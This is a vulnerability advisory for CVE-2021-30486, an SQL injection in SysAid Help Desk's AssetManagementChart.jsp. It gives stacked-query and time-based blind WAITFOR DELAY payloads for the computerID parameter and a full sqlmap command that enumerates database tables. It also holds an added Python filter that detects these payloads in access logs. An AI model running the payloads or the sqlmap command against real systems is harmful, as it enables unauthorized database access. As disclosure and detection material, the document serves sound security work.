SysAID II – SQLI [CVE-2021-30486]

SysAid Technologies (formerly Ilient) is an international company founded in 2002 that develops and provides IT Service Management software. SysAid Technologies is a privately owned company, founded by Israel Lifshitz (also founder of NUBO Software).

SysAID Help Desk System v20.3.64 b14.

Exploiting the vulnerability requires user-level access to the system. In the «Asset Management» option, the request is captured when an item is selected from the ListBox control.

Affected files:

Method: GET
Parameter: computerID

Method: POST
Parameter: group1

Method: GET
Parameter: computerID, group1

Method: GET
Parameter: group1

When the chart loads, the application sends the POST request from «AssetManagementChart.jsp» with the parameters «ComputerID» (String) and «Group1» (Integer).

We will use the «ComputerID» parameter to exploit the blind and stacked-query SQL injection vulnerability using sqlmap.

The parameter can be exploited with two injection techniques, each with its own payload:

Stacked queries:
PAYLOAD: computerID=<VALUE>';WAITFOR DELAY '0:0:4'--&group1=Server&group2=&group1Name=computer_type&group2Name=null&viewName=Servers and Network devices&displayValue=<BASE64@VALUE>&source=2&chartItemType=0&period=day


Time-based blind:
PAYLOAD: computerID=<VALUE>' WAITFOR DELAY '0:0:4'-- cnxC&group1=Server&group2=&group1Name=computer_type&group2Name=null&viewName=Servers and Network devices&displayValue=<BASE64@VALUE>=&source=2&chartItemType=0&period=day


sqlmap -u '<HOST>:80/AssetManagementChart.jsp?computerID=<VALUE>&group1=Server&group2=&group1Name=computer_type&group2Name=null&viewName=Servers%20and%20Network%20devices&displayValue=@BASE64@<VALUE-BASE64>&source=2&chartItemType=0&period=day' --level=5 --risk=3 -p 'computerID' --random-agent --is-dba --threads=2 --hex -o -v 3 --time-sec=4 --tamper=between,unmagicquotes,charencode --cookie='<COOKIE>;accountId=<VALUE>;userType=<VALUE>' --tables
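
A detection counterpart to the payloads above, added here as an example and not part of the original advisory or of SysAid's code: a Python filter that flags access-log entries whose computerID or group1 value carries the quote, stacked-query, comment or WAITFOR DELAY markers, including double-encoded ones. The log format, sample lines and function names are assumptions; it reads query strings only, so parameters sent in a POST body need a request-body log.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory names as injectable. Matching is by parameter name on
# any path, because the advisory's list of affected files carries no file names.
WATCHED_PARAMS = {"computerid", "group1"}
# Markers taken from the advisory's payloads: quote break-out, stacked-query
# separator, SQL comment, and the SQL Server WAITFOR DELAY statement.
SUSPICIOUS = re.compile(r"waitfor\s+delay|--|;|'", re.IGNORECASE)
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format); not taken from a real system.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Mar/2021:10:00:01 +0000] "GET /AssetManagementChart.jsp'
    '?computerID=PC-0042&group1=Server&period=day HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Mar/2021:10:00:09 +0000] "GET /AssetManagementChart.jsp'
    '?computerID=PC-0042%27%3BWAITFOR%20DELAY%20%270%3A0%3A4%27--&group1=Server'
    ' HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Mar/2021:10:00:15 +0000] "GET /AssetManagementChart.jsp'
    '?computerID=PC-0042%2527%20WAITFOR%20DELAY%20%25270%3A0%3A4%2527--'
    '&group1=Server HTTP/1.1" 200 5120',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding, e.g. %2527 -> %27 -> '."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_line(line):
    """Return (parameter, decoded value) pairs that look like injection attempts."""
    match = REQUEST.search(line)
    if not match:
        return []
    hits = []
    query = urlsplit(match.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)
        if name.lower() in WATCHED_PARAMS and SUSPICIOUS.search(value):
            hits.append((name, value))
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value in flag_line(line):
            print(f"ALERT {name}={value!r}")
```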

Product: SysAid Help Desk EE
Discovered: 30-03-2021
Vulnerable version: SYSAID v20.3.64 b14 (and previous)

The vulnerable version in the Shodan search engine.

CVE ID: CVE-2021-30486